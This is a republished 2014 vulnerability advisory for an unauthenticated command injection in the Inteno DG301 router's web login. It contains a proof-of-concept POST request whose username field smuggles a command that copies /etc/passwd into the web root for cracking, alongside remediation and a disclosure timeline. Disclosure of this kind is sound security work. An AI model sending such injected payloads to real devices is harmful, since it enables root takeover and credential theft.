what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Inteno DG301 Command Injection

Inteno DG301 Command Injection
Posted Feb 4, 2014
Authored by Juan J. Guelfo | Site encripto.no

Inteno DG301 routers are susceptible to a remote command injection vulnerability. Proof of concept included.

tags | exploit, remote, proof of concept
SHA-256 | 8b76e6779429975b9c369e86d1e0d8e31af365096fd2ecc0ca1dcc4883d30e25

Inteno DG301 Command Injection

Change Mirror Download
1.    Background

According to the vendor, Inteno DG301 is a high-end Multi-WAN
residential gateway with advanced router and bridge functions.


2. Summary

Inteno DG301 Powered by LuCI Trunk (inteno-1.0.34) and OpenWrt Backfire
10.03.1-RC6 is vulnerable to command injection, which can be exploited
directly from the login form on the web interface.

The vulnerability could be exploited by unauthenticated attackers.
Successful exploitation would allow attackers to execute arbitrary
commands with root privileges.


3. Affected Products

DG301 Powered by LuCI Trunk (inteno-1.0.34) and OpenWrt Backfire
10.03.1-RC6.
Other products or previous versions may also be vulnerable.


4. Vulnerability and Proof of Concept (PoC)

The login form presented on the web administration interface (username
parameter) is vulnerable to command injection, due to the application
does not validate the user input in a proper manner.

The following PoC includes a POST request that should be sent to the
device via web. The request includes a command that will copy the
contents of "/etc/passwd" to a file "test.txt" on the root web folder
were the web administration interface is published.

POST /cgi-bin/luci HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 Gecko/20100101 Firefox
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sysauth=55f19d843ebf2de094b8a8a2acf5c3a7; sysauth=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

username=user`cp%20/etc/passwd%20/www/test.txt`&password=pass

After the request is sent, proceed to visit http://<routerIP>/test.txt.
This should display the contents of "/etc/passwd", including the root
password in encrypted (DES) form. From here, the root credentials could
be cracked in a reasonable amount of time. This attack could also be
used for enabling services (e.g. SSH), or running any other arbitrary
commands.


5. Remediation

The vendor has released a new firmware version - 1.6.8RC3.
Users are encouraged to update their devices in order to patch the
vulnerability.


6. Credit

The vulnerability was originally discovered in an Inteno DG301 device,
by Juan J. G├╝elfo at Encripto AS.
E-mail: post@encripto.no
Web: http://www.encripto.no

For more information about Encripto's research policy, please visit
http://www.encripto.no/forskning/


7. Timeline

24th of January 2014 - Vulnerabilities discovered by the researcher.
26th of January 2014 - Vulnerability details disclosed to the vendor.
31st of January 2013 - New firmware version launched by the vendor,
which addresses the vulnerability.
3rd of February 2014 - Public disclosure.


8. References

http://www.encripto.no/forskning/whitepapers/Inteno_DG301_advisory_feb_2014.pdf


DISCLAIMER

The material presented in this document is for educational purposes
only. Encripto AS cannot be
responsible for any loss or damage carried out by any technique
presented in this material. The reader is
the only one responsible for applying this knowledge, which is at his /
her own risk.
Any of the trademarks, service marks, collective marks, design rights,
personality rights or similar rights
that are mentioned, used or cited in this document is property of their
respective owners.



Kind regards
*Juan J. Guelfo*

Encripto AS - Information Security

Mailbox 2017, 6028 Aalesund, Norway.
Phone: +47 912 40 380 | www.encripto.no <http://www.encripto.no>

Login or Register to add favorites

File Archive:

December 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    0 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    32 Files
  • 5
    Dec 5th
    10 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close